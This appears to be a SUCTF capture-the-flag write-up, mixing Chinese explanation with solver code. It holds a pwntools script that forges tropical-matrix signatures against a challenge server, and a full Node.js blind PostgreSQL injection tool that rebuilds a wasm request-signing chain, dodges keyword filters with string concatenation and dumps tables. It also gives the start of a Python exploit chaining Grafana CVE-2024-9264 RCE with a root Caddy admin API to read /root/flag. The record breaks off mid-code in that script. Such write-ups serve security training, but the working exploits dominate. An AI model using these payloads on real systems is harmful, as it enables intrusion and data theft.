设 $M$ 的第 $i$ 行最小值为 $R\_min_i$,第 $j$ 列最小值为 $C\_min_j$。我们将目标矩阵设为 $W_{i,j} = R\_min_i + C\_min_j$。

构造 $A$ 和 $B$:我们需要 $A \times B = W$,且 $A, B$ 满足常规秩要求(秩为 7)。我们可以利用随机的布尔覆盖矩阵:如果覆盖位为 1,则填入 $R\_min_i$(对 $A$)或 $C\_min_j$(对 $B$);否则填入较大的随机数(如 200)。这样既能保证热带乘积为 $W$,又能保证满秩

构造 $S$:为了满足 $W \neq S$ 并控制满秩,我们可以让 $S$ 几乎等于 $W$,仅在对角线上加 1:$S_{i,j} = W_{i,j}$(当 $i \neq j$);$S_{i,i} = W_{i,i} + 1$

构造 $P$:因为对角线上 $S_{i,i} > W_{i,i}$,我们需要 $MP$ 在对角线上提供最小值 $W_{i,i}$。对于每一列 $j$,找到 $M$ 第 $j$ 行的最小值索引 $k_j$,令 $P_{k_j, j} = C\_min_j$,其余元素填大数(如 200)

构造 $R$:用随机大数(如 200~255)填充 $R$,使其满秩且在取最小值时不产生影响

from pwn import *
import numpy as np
import json
from hashlib import sha3_512


def H(x):
    """Return the SHA3-512 digest of the bytes ``x`` as a list of 64 integers."""
    # Iterating over the raw digest yields the same byte values as parsing
    # the hex digest two characters at a time.
    return list(sha3_512(x).digest())

def solve_matrices(foodname):
    """Forge the five matrices for ``foodname`` and return them as a JSON string.

    With ``R_min``/``C_min`` the row/column minima of the hash matrix ``M``,
    the target is ``W[i][j] = R_min[i] + C_min[j]``. ``A`` and ``B`` are built
    so that their min-plus product is ``W``; ``P``, ``R`` and ``S`` are built
    so that the entry-wise minimum of ``M*P``, ``R*M`` and ``S`` is ``W`` too.

    Args:
        foodname: The dish name announced by the server.

    Returns:
        JSON object with the keys ``A``, ``B``, ``P``, ``R`` and ``S``.
    """
    tmp = H(foodname.encode())
    M = np.array(tmp).reshape(8, 8)

    # Row and column minima of M.
    R_min = np.min(M, axis=1)
    C_min = np.min(M, axis=0)

    # A (8x7) and B (7x8): random 0/1 cover patterns; a covered cell holds the
    # row/column minimum, every other cell a large filler value.
    while True:
        ZA = np.random.randint(0, 2, (8, 7))
        ZB = np.random.randint(0, 2, (7, 8))
        if np.all(ZA @ ZB > 0):  # every (i, j) shares at least one covered index
            A = np.where(ZA == 1, R_min[:, None], np.random.randint(200, 255, (8, 7)))
            B = np.where(ZB == 1, C_min[None, :], np.random.randint(200, 255, (7, 8)))
            if np.linalg.matrix_rank(A) == 7 and np.linalg.matrix_rank(B) == 7:
                break

    # P (8x8): large filler, except one cell per column j chosen so that
    # (M*P)[j][j] equals W[j][j].
    while True:
        P = np.random.randint(200, 255, (8, 8))
        for j in range(8):
            k_j = np.argmin(M[j, :])
            P[k_j, j] = int(C_min[j])
        if np.linalg.matrix_rank(P) == 8:
            break

    # R (8x8): large random filler with full rank.
    while True:
        R = np.random.randint(200, 255, (8, 8))
        if np.linalg.matrix_rank(R) == 8:
            break

    # S (8x8): equal to W off the diagonal and W + 1 on it; the diagonal is
    # raised further until S has full rank.
    W = R_min[:, None] + C_min[None, :]
    S = W.copy()
    np.fill_diagonal(S, np.diag(W) + 1)
    while np.linalg.matrix_rank(S) < 8:
        np.fill_diagonal(S, np.diag(S) + 1)

    payload = {
        "A": A.tolist(),
        "B": B.tolist(),
        "P": P.tolist(),
        "R": R.tolist(),
        "S": [[int(x) for x in row] for row in S]
    }
    return json.dumps(payload)


def exploit():
    """Connect to the service, request the flag challenge and answer it with a forged signature."""
    HOST = '101.245.107.149'
    PORT = 10020

    log.info(f"Connecting to {HOST}:{PORT}...")
    io = remote(HOST, PORT)

    # Wait for the menu prompt and choose option 2.
    io.recvuntil(b">>> ")
    log.info("Sending option 2 (Please give me the FLAG!)")
    io.sendline(b"2")

    # Extract the dish name generated by the server.
    io.recvuntil(b'The waiter says: "Please make ')
    foodname = io.recvuntil(b' for me!"', drop=True).decode()
    log.success(f"Intercepted target foodname: {foodname}")

    # Build the payload.
    log.info("Calculating tropical matrices...")
    payload_json = solve_matrices(foodname)
    log.success("Payload generated successfully!")

    # Send the payload.
    io.recvuntil(b">>> ")
    io.sendline(payload_json.encode())

    # Read and print whatever the server answers.
    log.info("Waiting for the waiter's response...")
    response = io.recvall(timeout=3).decode().strip()

    print("\n" + "="*50)
    print("SERVER RESPONSE:")
    print(response)
    print("="*50 + "\n")

    if "flag{" in response or "FLAG:" in response:
        log.success("Pwned! Check the flag above.")
    else:
        log.warning("Did not find flag pattern in response. Check the output.")


if __name__ == '__main__':
    exploit()
# SUCTF{W3lc0m3_t0_SU_R3stAur4nt_n3Xt_t1me!:-)}

Web

SU_sqli

Zhou discovered a SQL injection vulnerability. Are you able to compromise the target?

(() => {
// Base64-encoded string table; _d(i) decodes entry i.
const _s = [
"L2FwaS9zaWdu", // 0: "/api/sign"
"L2FwaS9xdWVyeQ==", // 1: "/api/query"
"UE9TVA==", // 2: "POST"
"Y29udGVudC10eXBl", // 3: "content-type"
"YXBwbGljYXRpb24vanNvbg==", // 4: "application/json"
"Y3J5cHRvMS53YXNt", // 5: "crypto1.wasm"
"Y3J5cHRvMi53YXNt" // 6: "crypto2.wasm"
];
const _d = (i) => atob(_s[i]);

// Shorthand for document.getElementById, plus the output and error elements.
const $ = (id) => document.getElementById(id);
const out = $("out");
const err = $("err");

// Caches the promise created by loadWasm() so the modules are loaded once.
let wasmReady;

// Decode a base64url string (with or without padding) into a Uint8Array.
function b64UrlToBytes(s) {
  const standard = s.replace(/-/g, "+").replace(/_/g, "/");
  // Restore the "=" padding up to a multiple of four characters.
  const padded = standard + "=".repeat((4 - (standard.length % 4)) % 4);
  const decoded = atob(padded);
  return Uint8Array.from(decoded, (ch) => ch.charCodeAt(0));
}

// Encode a byte array as unpadded base64url.
function bytesToB64Url(bytes) {
  const binary = Array.from(bytes, (b) => String.fromCharCode(b)).join("");
  const standard = btoa(binary);
  return standard.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
}

// Rotate the 32-bit value x left by r bits; the result is an unsigned 32-bit number.
function rotl32(x, r) {
  const shiftedUp = x << r;
  const wrapped = x >>> (32 - r);
  return (shiftedUp | wrapped) >>> 0;
}

// Rotate the 32-bit value x right by r bits; the result is an unsigned 32-bit number.
function rotr32(x, r) {
  const shiftedDown = x >>> r;
  const wrapped = x << (32 - r);
  return (shiftedDown | wrapped) >>> 0;
}

const rotScr = [1, 5, 9, 13, 17, 3, 11, 19];

// Derive a 32-byte mask from the nonce and timestamp: a base-131 polynomial
// hash of the nonce bytes, XORed with both 32-bit halves of ts, seeds a
// xorshift (13, 17, 5) generator whose low byte is emitted at each step.
function maskBytes(nonceB64, ts) {
  let state = 0;
  for (const byte of b64UrlToBytes(nonceB64)) {
    state = (Math.imul(state, 131) + byte) >>> 0;
  }

  const tsLow = ts >>> 0;
  const tsHigh = Math.floor(ts / 0x100000000) >>> 0;
  state = (state ^ tsLow ^ tsHigh) >>> 0;

  const mask = new Uint8Array(32);
  for (let idx = 0; idx < 32; idx++) {
    state ^= (state << 13) >>> 0;
    state ^= state >>> 17;
    state ^= (state << 5) >>> 0;
    mask[idx] = state & 0xff;
  }
  return mask;
}

// Undo the scrambling of the 32-byte value returned by __suPrep: rotate each
// little-endian 32-bit word right by its rotScr amount, then XOR the whole
// buffer with maskBytes(nonce, ts). Throws Error("prep") unless the input
// decodes to exactly 32 bytes.
function unscramble(pre, nonceB64, ts) {
  const bytes = b64UrlToBytes(pre);
  if (bytes.length !== 32) throw new Error("prep");

  const words = new DataView(bytes.buffer, bytes.byteOffset, bytes.byteLength);
  for (let wordIdx = 0; wordIdx < 8; wordIdx++) {
    const offset = wordIdx * 4;
    const rotated = rotr32(words.getUint32(offset, true), rotScr[wordIdx]);
    words.setUint32(offset, rotated, true);
  }

  maskBytes(nonceB64, ts).forEach((maskByte, idx) => {
    bytes[idx] ^= maskByte;
  });
  return bytes;
}

// Derive a 32-byte mask from the probe string and timestamp: a base-33
// polynomial hash over the UTF-16 code units, XORed with both halves of ts,
// seeds a linear congruential generator (x * 1103515245 + 12345); bits
// 16..23 of each state are emitted.
function probeMask(probe, ts) {
  let state = 0;
  for (const unit of probe.split("")) {
    state = (Math.imul(state, 33) + unit.charCodeAt(0)) >>> 0;
  }

  const tsLow = ts >>> 0;
  const tsHigh = Math.floor(ts / 0x100000000) >>> 0;
  state = (state ^ tsLow ^ tsHigh) >>> 0;

  const mask = new Uint8Array(32);
  for (let idx = 0; idx < 32; idx++) {
    state = (Math.imul(state, 1103515245) + 12345) >>> 0;
    mask[idx] = (state >>> 16) & 0xff;
  }
  return mask;
}

// Mix buf in place with the probe-derived mask and return it:
//   - if bit 0 of mask[0] is set, swap each pair of adjacent bytes;
//   - if bit 1 of mask[1] is set, rotate each little-endian word left by 3;
//   - finally XOR every byte with the mask.
function mixSecret(buf, probe, ts) {
  const mask = probeMask(probe, ts);
  const swapPairs = (mask[0] & 1) !== 0;
  const rotateWords = (mask[1] & 2) !== 0;

  if (swapPairs) {
    for (let i = 0; i < 32; i += 2) {
      [buf[i], buf[i + 1]] = [buf[i + 1], buf[i]];
    }
  }

  if (rotateWords) {
    for (let base = 0; base < 32; base += 4) {
      const word =
        (buf[base] | (buf[base + 1] << 8) | (buf[base + 2] << 16) | (buf[base + 3] << 24)) >>> 0;
      const rotated = rotl32(word, 3);
      for (let k = 0; k < 4; k++) {
        buf[base + k] = (rotated >>> (8 * k)) & 0xff;
      }
    }
  }

  for (let i = 0; i < 32; i++) buf[i] ^= mask[i];
  return buf;
}

// Load and start both Go WebAssembly modules once. The returned promise is
// cached in wasmReady; it resolves to true once both globals __suPrep and
// __suFinish are functions, and rejects with Error("wasm init") otherwise.
async function loadWasm() {
if (wasmReady) return wasmReady;
wasmReady = (async () => {
// First module: /static/ + _s[5].
const go1 = new Go();
const resp1 = await fetch("/static/" + _d(5));
const buf1 = await resp1.arrayBuffer();
const { instance: inst1 } = await WebAssembly.instantiate(buf1, go1.importObject);
// run() is not awaited.
go1.run(inst1);

// Second module: /static/ + _s[6].
const go2 = new Go();
const resp2 = await fetch("/static/" + _d(6));
const buf2 = await resp2.arrayBuffer();
const { instance: inst2 } = await WebAssembly.instantiate(buf2, go2.importObject);
go2.run(inst2);

// Poll up to 100 times, 10 ms apart, for the two exported globals.
for (let i = 0; i < 100; i++) {
if (typeof globalThis.__suPrep === "function" && typeof globalThis.__suFinish === "function") return true;
await new Promise((r) => setTimeout(r, 10));
}
throw new Error("wasm init");
})();
return wasmReady;
}

// GET the URL in _s[0] and return the `data` field of the JSON response.
// Throws Error(data.error || "sign") when the response's `ok` field is falsy.
async function getSignMaterial() {
const res = await fetch(_d(0), { method: "GET" });
const data = await res.json();
if (!data.ok) throw new Error(data.error || "sign");
return data.data;
}

// Sign the query typed into #q and send it to the URL in _s[1].
// Steps: load the wasm modules, fetch the sign material, build the browser
// "probe" string, then __suPrep -> unscramble -> mixSecret -> __suFinish.
// The result is written to #out; errors are written to #err.
async function doQuery() {
err.textContent = "";
out.textContent = "";
const q = $("q").value || "";
if (!q) {
err.textContent = "empty";
return;
}
try {
await loadWasm();
const material = await getSignMaterial();
// Browser fingerprint inputs: user agent, UA brands, time zone, Intl and webdriver flags.
const ua = navigator.userAgent || "";
const uaData = navigator.userAgentData;
const brands = uaData && uaData.brands ? uaData.brands.map((b) => b.brand + ":" + b.version).join(",") : "";
const tz = (() => {
try {
return Intl.DateTimeFormat().resolvedOptions().timeZone || "";
} catch {
return "";
}
})();
const intl = (() => {
try {
return Intl.DateTimeFormat().resolvedOptions().locale ? "1" : "0";
} catch {
return "0";
}
})();
const wd = navigator.webdriver ? "1" : "0";
// Probe format: wd=<0|1>;tz=<zone>;b=<brand:version,...>;intl=<0|1>
const probe = "wd=" + wd + ";tz=" + tz + ";b=" + brands + ";intl=" + intl;

// Stage 1 (wasm): arguments are method, path, query, nonce, ts, seed, salt, UA, probe.
const pre = globalThis.__suPrep(
_d(2),
_d(1),
q,
material.nonce,
String(material.ts),
material.seed,
material.salt,
ua,
probe
);
if (!pre) throw new Error("prep");
// Stage 2 (JS): undo the scrambling, then mix in the probe-derived mask.
const secret2 = unscramble(pre, material.nonce, material.ts);
const mixed = mixSecret(secret2, probe, material.ts);
// Stage 3 (wasm): produce the final signature from the mixed secret.
const sig = globalThis.__suFinish(
_d(2),
_d(1),
q,
material.nonce,
String(material.ts),
bytesToB64Url(mixed),
probe
);

// Send the signed request as JSON: { q, nonce, ts, sign }.
const res = await fetch(_d(1), {
method: _d(2),
headers: { [_d(3)]: _d(4) },
body: JSON.stringify({ q, nonce: material.nonce, ts: material.ts, sign: sig })
});
const data = await res.json();
if (!data.ok) {
err.textContent = data.error || "error";
return;
}
out.textContent = JSON.stringify(data.data, null, 2);
} catch (e) {
err.textContent = String(e.message || e);
}
}

// Once the DOM is ready, run doQuery on a click of #run or on Enter in #q.
window.addEventListener("DOMContentLoaded", () => {
$("run").addEventListener("click", doQuery);
$("q").addEventListener("keydown", (e) => {
if (e.key === "Enter") doQuery();
});
});
})();

前端不会直接把 q 发送到 /api/query,而是先调用 /api/sign 获取 nonce/ts/seed/salt,然后调用 wasm 暴露的两个函数:

  • __suPrep(...)
  • __suFinish(...)

中间还会进行两段 JS 混淆处理:

  1. unscramble(pre, nonce, ts)
  2. mixSecret(secret2, probe, ts)

最终得到 sign,请求体为:

{
"q": "...",
"nonce": "...",
"ts": 123456789,
"sign": "..."
}

所以,第一步不是直接注入,而是先完整复现签名链,让服务端接受我们构造的 SQL payload

用复现签名后的请求测试单引号:

  • 输入: '
  • 返回: ERROR: unterminated quoted string ... (SQLSTATE 42601)

可确定: 存在 SQL 注入;数据库是 PostgreSQL;输入在字符串上下文中
同时观察到有关键字拦截(返回 blocked),常见的 UNION / OR / AND / -- / /* / ; 会被过滤

虽然被过滤了常规拼接方式,但仍可利用字符串拼接表达式:

%'||(SELECT ... )||'

其核心是把原有 LIKE '%{q}%'中的字符串闭合后,拼接一个子查询表达式,再补回字符串

为了避免 OR/AND 关键字,我们使用:

CASE WHEN (条件) THEN '%' ELSE 'NO_MATCH' END

这样查询是否返回记录数量(有数据 / 无数据)就能作为布尔信号,形成盲注通道

布尔探测 payload 模板:

%'||(SELECT CASE WHEN (<cond>) THEN '%' ELSE 'NO_MATCH_9QX' END)||'

判断规则:

  • 返回 data 非空 -> 条件为真
  • 返回 data 为空 -> 条件为假

随后通过二分法逐字符读取:

  1. 先判断长度是否覆盖当前位置
  2. ascii(substring(...)) >= mid 做二分
  3. 还原字符串

枚举目标为:

  • pg_class + pg_namespace 枚举 public 下普通表
  • 对每个表用 row_to_json 读取首行内容

最终表有:

  • posts
  • secrets

secrets 首行拿到:
{"id":1,"flag":"SUCTF{P9s9L_!Nject!On_IS_3@$Y_RiGht}"}

const fs = require("fs");
const path = require("path");

const target = process.argv[2] || "http://101.245.108.250:10001";

const UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36";

// Decode a base64url string (with or without padding) into a Uint8Array.
function b64UrlToBytes(s) {
  const standard = s.replace(/-/g, "+").replace(/_/g, "/");
  // Restore the "=" padding up to a multiple of four characters.
  const padded = standard + "=".repeat((4 - (standard.length % 4)) % 4);
  const decoded = Buffer.from(padded, "base64");
  return new Uint8Array(decoded);
}

// Encode a byte array as unpadded base64url.
function bytesToB64Url(bytes) {
  const standard = Buffer.from(bytes).toString("base64");
  const urlSafe = standard.replace(/\+/g, "-").replace(/\//g, "_");
  return urlSafe.replace(/=+$/, "");
}

// Rotate the 32-bit value x left by r bits; the result is an unsigned 32-bit number.
function rotl32(x, r) {
  const shiftedUp = x << r;
  const wrapped = x >>> (32 - r);
  return (shiftedUp | wrapped) >>> 0;
}

/**
 * Rotate a 32-bit value right by r bits.
 *
 * @param {number} x Value to rotate (treated as 32 bits).
 * @param {number} r Rotation amount in bits.
 * @returns {number} The rotated value as an unsigned 32-bit number.
 */
function rotr32(x, r) {
  const shiftedDown = x >>> r;
  const wrappedAround = x << (32 - r);
  return (shiftedDown | wrappedAround) >>> 0;
}

// Right-rotation amount for each of the eight 32-bit words processed by unscramble().
const rotScr = [1, 5, 9, 13, 17, 3, 11, 19];

/**
 * Derive the 32-byte XOR mask used by unscramble() from the nonce and timestamp.
 *
 * The decoded nonce bytes are folded into a 32-bit state (multiplier 131),
 * the state is XORed with the low and high 32-bit halves of ts, and each
 * output byte is the low byte of the state after one 13/17/5 xorshift round.
 *
 * @param {string} nonceB64 URL-safe base64 nonce.
 * @param {number} ts Timestamp value supplied with the nonce.
 * @returns {Uint8Array} 32 mask bytes.
 */
function maskBytes(nonceB64, ts) {
  let state = b64UrlToBytes(nonceB64).reduce(
    (acc, byte) => (Math.imul(acc, 131) + byte) >>> 0,
    0
  );

  const tsLow = ts >>> 0;
  const tsHigh = Math.floor(ts / 0x100000000) >>> 0;
  state = (state ^ tsLow ^ tsHigh) >>> 0;

  const mask = new Uint8Array(32);
  for (let idx = 0; idx < mask.length; idx++) {
    state ^= (state << 13) >>> 0;
    state ^= state >>> 17;
    state ^= (state << 5) >>> 0;
    mask[idx] = state & 0xff;
  }
  return mask;
}

/**
 * Undo the scrambling applied to the value returned by __suPrep.
 *
 * Each of the eight little-endian 32-bit words is rotated right by the
 * matching rotScr entry, then the whole buffer is XORed with maskBytes().
 *
 * @param {string} pre URL-safe base64 text that must decode to exactly 32 bytes.
 * @param {string} nonceB64 URL-safe base64 nonce.
 * @param {number} ts Timestamp value supplied with the nonce.
 * @returns {Uint8Array} The 32 unscrambled bytes.
 * @throws {Error} "prep" when the decoded input is not 32 bytes long.
 */
function unscramble(pre, nonceB64, ts) {
  const bytes = b64UrlToBytes(pre);
  if (bytes.length !== 32) throw new Error("prep");

  for (let word = 0; word < 8; word++) {
    const base = word * 4;
    const packed =
      (bytes[base] |
        (bytes[base + 1] << 8) |
        (bytes[base + 2] << 16) |
        (bytes[base + 3] << 24)) >>> 0;
    const rotated = rotr32(packed, rotScr[word]);
    // Write the rotated word back in little-endian byte order.
    for (let k = 0; k < 4; k++) {
      bytes[base + k] = (rotated >>> (8 * k)) & 0xff;
    }
  }

  maskBytes(nonceB64, ts).forEach((maskByte, idx) => {
    bytes[idx] ^= maskByte;
  });
  return bytes;
}

/**
 * Derive the 32-byte mask used by mixSecret() from the probe string and timestamp.
 *
 * The UTF-16 code units of probe are folded into a 32-bit state (multiplier 33),
 * the state is XORed with the low and high 32-bit halves of ts, and each output
 * byte is bits 16..23 of the state after one step of the linear congruential
 * update state * 1103515245 + 12345 (mod 2^32).
 *
 * @param {string} probe Probe string.
 * @param {number} ts Timestamp value.
 * @returns {Uint8Array} 32 mask bytes.
 */
function probeMask(probe, ts) {
  let state = 0;
  for (let idx = 0; idx < probe.length; idx++) {
    state = (Math.imul(state, 33) + probe.charCodeAt(idx)) >>> 0;
  }

  const tsLow = ts >>> 0;
  const tsHigh = Math.floor(ts / 0x100000000) >>> 0;
  state = (state ^ tsLow ^ tsHigh) >>> 0;

  // The mapping callback runs once per index in ascending order, advancing the state each time.
  return Uint8Array.from({ length: 32 }, () => {
    state = (Math.imul(state, 1103515245) + 12345) >>> 0;
    return (state >>> 16) & 0xff;
  });
}

/**
 * Apply the second obfuscation stage to a 32-byte buffer, in place.
 *
 * Depending on two bits of probeMask(probe, ts), adjacent bytes are swapped
 * and/or each little-endian 32-bit word is rotated left by 3; finally the
 * buffer is XORed with the mask.
 *
 * @param {Uint8Array} buf 32-byte buffer; it is modified and returned.
 * @param {string} probe Probe string.
 * @param {number} ts Timestamp value.
 * @returns {Uint8Array} The same buffer object that was passed in.
 */
function mixSecret(buf, probe, ts) {
  const mask = probeMask(probe, ts);
  const swapPairs = (mask[0] & 1) !== 0;
  const rotateWords = (mask[1] & 2) !== 0;

  if (swapPairs) {
    for (let even = 0; even < 32; even += 2) {
      [buf[even], buf[even + 1]] = [buf[even + 1], buf[even]];
    }
  }

  if (rotateWords) {
    for (let base = 0; base < 32; base += 4) {
      const packed =
        (buf[base] |
          (buf[base + 1] << 8) |
          (buf[base + 2] << 16) |
          (buf[base + 3] << 24)) >>> 0;
      const rotated = rotl32(packed, 3);
      // Write the rotated word back in little-endian byte order.
      for (let k = 0; k < 4; k++) {
        buf[base + k] = (rotated >>> (8 * k)) & 0xff;
      }
    }
  }

  mask.forEach((maskByte, idx) => {
    buf[idx] ^= maskByte;
  });
  return buf;
}

/**
 * Start both wasm modules and wait until they expose __suPrep and __suFinish.
 *
 * Loads ./wasm_exec.js (which provides globalThis.Go), instantiates
 * crypto1.wasm and crypto2.wasm from this script's directory, then polls up
 * to 200 times at 10 ms intervals for the two global functions.
 *
 * @returns {Promise<void>} Resolves once both functions are available.
 * @throws {Error} "wasm init failed" if they never appear.
 */
async function loadWasm() {
  require("./wasm_exec.js");

  const startModule = async (fileName) => {
    const go = new globalThis.Go();
    const wasmBytes = fs.readFileSync(path.join(__dirname, fileName));
    const { instance } = await WebAssembly.instantiate(wasmBytes, go.importObject);
    // Not awaited: readiness is detected by polling for the exported globals below.
    go.run(instance);
  };

  await startModule("crypto1.wasm");
  await startModule("crypto2.wasm");

  const exportsReady = () =>
    typeof globalThis.__suPrep === "function" &&
    typeof globalThis.__suFinish === "function";

  for (let attempt = 0; attempt < 200; attempt++) {
    if (exportsReady()) return;
    await new Promise((resolve) => setTimeout(resolve, 10));
  }
  throw new Error("wasm init failed");
}

/**
 * Send one query string to /api/query with a freshly computed signature.
 *
 * Flow: GET /api/sign for nonce/ts/seed/salt, call __suPrep, run the result
 * through unscramble() and mixSecret(), call __suFinish to obtain the
 * signature, then POST { q, nonce, ts, sign } to /api/query.
 *
 * @param {string} q Value for the "q" field (here: the SQL injection payload).
 * @returns {Promise<any>} Parsed JSON body of the /api/query response.
 * @throws {Error} When /api/sign reports failure, or when either wasm step
 *   returns an empty value.
 */
async function signedQuery(q) {
  const signRes = await fetch(`${target}/api/sign`, {
    headers: { "user-agent": UA }
  });
  const signData = await signRes.json();
  if (!signData.ok) throw new Error(`sign failed: ${JSON.stringify(signData)}`);
  const material = signData.data;

  // The same probe string must be given to __suPrep, mixSecret and __suFinish.
  const probe = "wd=0;tz=Asia/Shanghai;b=Chromium:137,Not=A?Brand:24,Google Chrome:137;intl=1";
  const method = "POST";
  const route = "/api/query";
  const tsText = String(material.ts);

  const pre = globalThis.__suPrep(
    method,
    route,
    q,
    material.nonce,
    tsText,
    material.seed,
    material.salt,
    UA,
    probe
  );
  if (!pre) throw new Error("prep failed");

  const secret2 = unscramble(pre, material.nonce, material.ts);
  const mixed = mixSecret(secret2, probe, material.ts);
  const sig = globalThis.__suFinish(
    method,
    route,
    q,
    material.nonce,
    tsText,
    bytesToB64Url(mixed),
    probe
  );
  // Mirror the __suPrep guard: fail here instead of posting an empty signature.
  if (!sig) throw new Error("finish failed");

  const res = await fetch(`${target}${route}`, {
    method,
    headers: {
      "content-type": "application/json",
      "user-agent": UA
    },
    body: JSON.stringify({ q, nonce: material.nonce, ts: material.ts, sign: sig })
  });
  return res.json();
}

/**
 * Wrap a SQL condition in the boolean-probe payload.
 *
 * The payload closes the surrounding string, concatenates a CASE expression
 * that yields '%' when the condition holds and 'NO_MATCH_9QX' otherwise, and
 * reopens a string.
 *
 * @param {string} condSql SQL boolean expression to evaluate.
 * @returns {string} Payload to send as the "q" value.
 */
function makePayload(condSql) {
  const prefix = "%'||(SELECT CASE WHEN (";
  const suffix = ") THEN '%' ELSE 'NO_MATCH_9QX' END)||'";
  return prefix + condSql + suffix;
}

/**
 * Evaluate a SQL condition through the blind-injection channel.
 *
 * @param {string} condSql SQL boolean expression.
 * @returns {Promise<boolean>} true when the response's data is a non-empty array.
 * @throws {Error} "query failed: ..." when the response's ok field is falsy.
 */
async function askBool(condSql) {
  const reply = await signedQuery(makePayload(condSql));
  if (reply.ok) {
    return Array.isArray(reply.data) && reply.data.length > 0;
  }
  throw new Error(`query failed: ${JSON.stringify(reply)}`);
}

/**
 * Recover the character code at a 1-based position of a SQL string expression.
 *
 * First checks that the expression is at least pos characters long, then
 * binary-searches the range 32..126 with ascii(substring(...)) >= pivot probes,
 * pausing 80 ms after each probe.
 *
 * @param {string} exprSql SQL expression that yields the string being read.
 * @param {number} pos 1-based character position.
 * @returns {Promise<number>} 0 when pos is beyond the string, otherwise a code in 32..126.
 */
async function findAscii(exprSql, pos) {
  const withinLength = await askBool(`(SELECT length(${exprSql}))>=${pos}`);
  if (!withinLength) return 0;

  let low = 32;
  let high = 126;
  while (low < high) {
    // Upper midpoint, so that "low = pivot" always makes progress.
    const pivot = Math.ceil((low + high) / 2);
    const atLeastPivot = await askBool(
      `(SELECT ascii(substring(${exprSql} from ${pos} for 1)))>=${pivot}`
    );
    if (atLeastPivot) {
      low = pivot;
    } else {
      high = pivot - 1;
    }
    await new Promise((resolve) => setTimeout(resolve, 80));
  }
  return low;
}

/**
 * Read a SQL string expression character by character, echoing progress to stdout.
 *
 * @param {string} exprSql SQL expression that yields the string being read.
 * @param {number} [maxLen=80] Maximum number of characters to read.
 * @returns {Promise<string>} The recovered text; reading stops early when findAscii returns 0.
 */
async function readString(exprSql, maxLen = 80) {
  let text = "";
  let pos = 1;
  while (pos <= maxLen) {
    const code = await findAscii(exprSql, pos);
    if (!code) break;
    text += String.fromCharCode(code);
    // Rewrite the current line so the partial result is visible while reading.
    process.stdout.write(`\r${text}`);
    pos += 1;
  }
  process.stdout.write("\n");
  return text;
}

/**
 * Read the name of the idx-th relation whose relkind is 'r' in schema 'public'.
 *
 * The filter compares concat(relkind, nspname) with 'rpublic', which expresses
 * both conditions in a single comparison.
 *
 * @param {number} idx Zero-based OFFSET into the matching relations.
 * @returns {Promise<string|null>} The relation name (up to 40 characters), or null when no row exists at idx.
 */
async function tableAt(idx) {
  const nameExpr = `(SELECT c.relname FROM pg_class c JOIN pg_namespace n ON c.relnamespace=n.oid WHERE concat(c.relkind,n.nspname)='rpublic' OFFSET ${idx} LIMIT 1)`;
  const found = await askBool(`(SELECT length(${nameExpr}))>0`);
  return found ? readString(nameExpr, 40) : null;
}

/**
 * Read one row of a table as JSON text via row_to_json.
 *
 * @param {string} table Table name, interpolated into the SQL as-is.
 * @param {number} rowIdx Zero-based OFFSET of the row.
 * @returns {Promise<string|null>} Up to 180 characters of the row's JSON, or null when the expression is empty.
 */
async function dumpRowJson(table, rowIdx) {
  const rowExpr = `(SELECT concat((SELECT row_to_json(t) FROM ${table} t OFFSET ${rowIdx} LIMIT 1)))`;
  const found = await askBool(`(SELECT length(${rowExpr}))>0`);
  return found ? readString(rowExpr, 180) : null;
}

// Entry point: enumerate up to 8 tables, dump up to 3 rows from each, and stop
// at the first row whose JSON contains a flag-like marker.
(async () => {
  console.log(`[+] target: ${target}`);
  await loadWasm();

  const tableNames = [];
  for (let idx = 0; idx < 8; idx++) {
    process.stdout.write(`[+] enum table ${idx} ... `);
    const name = await tableAt(idx);
    if (!name) {
      console.log("none");
      break;
    }
    tableNames.push(name);
    console.log(`=> ${name}`);
  }

  const flagMarker = /flag\{|suctf\{|ctf\{/i;
  for (const table of tableNames) {
    console.log(`\n[+] dump first rows from ${table}`);
    for (let row = 0; row < 3; row++) {
      process.stdout.write(` row ${row}: `);
      const rowJson = await dumpRowJson(table, row);
      if (!rowJson) {
        console.log("<none>");
        break;
      }
      console.log(`=> ${rowJson}`);
      if (flagMarker.test(rowJson)) {
        console.log(`\nflag: ${rowJson}`);
        return;
      }
    }
  }
})().catch((err) => {
  console.error(err);
  process.exit(1);
});

SU_Thief

The lazy admin neglected that the closest thief around him could help him steal /root/flag

可以发现目标是 Grafana 11.0.0,尝试默认账号密码未能登录,随后爆破出弱口令 admin/1q2w3e,结合版本可以搜到 CVE-2024-9264

虽然 CVE-2024-9264 能 RCE,但执行身份是 grafana,权限不足以读取 /root/flag

所以这题的重点不是“直接打 RCE 读 root”,而是题目提示里的 “closest thief around him could help him steal”

枚举进程后发现:

  • caddy 以 root 身份运行
  • 本地可访问 Caddy admin API:127.0.0.1:2019

也就是:

  1. 我们先用 Grafana RCE(grafana 权限)
  2. 再从内网访问 Caddy admin API(root 服务)
  3. 热加载一个恶意 Caddy 配置,让它把 / 当静态目录暴露到一个新路由
  4. 最后从外部 HTTP 直接读 /root/flag
import argparse
import base64
import json
import re
import sys
from typing import Any, Dict

import requests


class ExploitError(Exception):
    """Raised when a step of the exploit chain fails."""


class SUThiefExploit:
    """Drive the SU_Thief chain against one Grafana instance.

    The chain is: run SQL expressions through Grafana's ``/api/ds/query``
    endpoint to read files and execute shell commands, use that to POST a new
    configuration to the Caddy admin API on ``127.0.0.1:2019``, then fetch
    ``/root/flag`` through the ``/steal/*`` route that configuration adds.
    """

    # File on the target that run_shell redirects command output into and
    # then reads back with read_file.
    _CMD_OUTPUT_PATH = "/tmp/grafana_cmd_output"

    def __init__(self, base_url: str, username: str, password: str, timeout: int = 15):
        """Store connection settings and open a ``requests`` session.

        Args:
            base_url: Target base URL; a trailing ``/`` is stripped.
            username: Grafana username used for basic auth.
            password: Grafana password used for basic auth.
            timeout: Per-request timeout in seconds.
        """
        self.base_url = base_url.rstrip("/")
        self.auth = (username, password)
        self.timeout = timeout
        self.session = requests.Session()

    def _ds_query(self, expression: str) -> Dict[str, Any]:
        """POST one SQL expression (refId ``B``) to ``/api/ds/query``.

        Args:
            expression: SQL text placed in the query's ``expression`` field.

        Returns:
            The decoded JSON response body.

        Raises:
            ExploitError: On a non-200 status or a body that is not JSON.
        """
        url = (
            f"{self.base_url}/api/ds/query"
            "?ds_type=__expr__&expression=true&requestId=Q101"
        )
        payload = {
            "queries": [
                {
                    "refId": "B",
                    "datasource": {
